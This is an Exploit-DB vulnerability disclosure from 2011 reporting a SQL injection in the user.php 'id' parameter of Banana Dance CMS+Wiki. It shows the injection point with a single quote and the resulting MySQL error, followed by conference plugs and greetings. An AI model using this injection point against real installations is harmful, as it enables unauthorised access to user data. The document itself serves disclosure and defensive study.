Banana Dance CMS and Wiki - SQL Injection

EDB-ID:

17919


Author:

Aodrulez

Type:

webapps


Platform:

PHP

Date:

2011-10-02


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

+-----------------------+
| Banana Dance CMS+Wiki |
+-----------------------+
  
Vulnerable Web-App : Banana Dance CMS+Wiki
Vulnerability      : SQLi
Author             : Aodrulez. 
Email              : f3arm3d3ar@gmail.com
Google-Dork        : :) Guess it.
Tested on          : Ubuntu 10.04
Web-App            : http://www.doyoubananadance.com/
Download Link      : http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7
 
 
+---------+
| Details |
+---------+

1] SQLi 
Exploit : http://localhost/user.php?id=1'[sqli]

Error:
------
Invalid query:
SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='1''
Error: You have an error in your SQL syntax; check the manual 
that corresponds to your MySQL server version for the right 
syntax to use near ''1''' at line 1



+----------+
|  MalCon  |
+----------+
(International Malware Conference)

The CFP for MalCon-2011 is ON!
If you think you are good enough, try cracking our
'Capture the Mal Challenge-2011' online.
Open to everyone!

For more details, visit http://malcon.org




+-------------------+
| Greetz Fly Out To |
+-------------------+
   
  
1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
7] www.nsd.org.in
8] LiquidWorm
 
+-------+
| Quote |
+-------+
 
"Microsoft is not the answer. Microsoft is the question. NO is the answer."   - Erik Naggum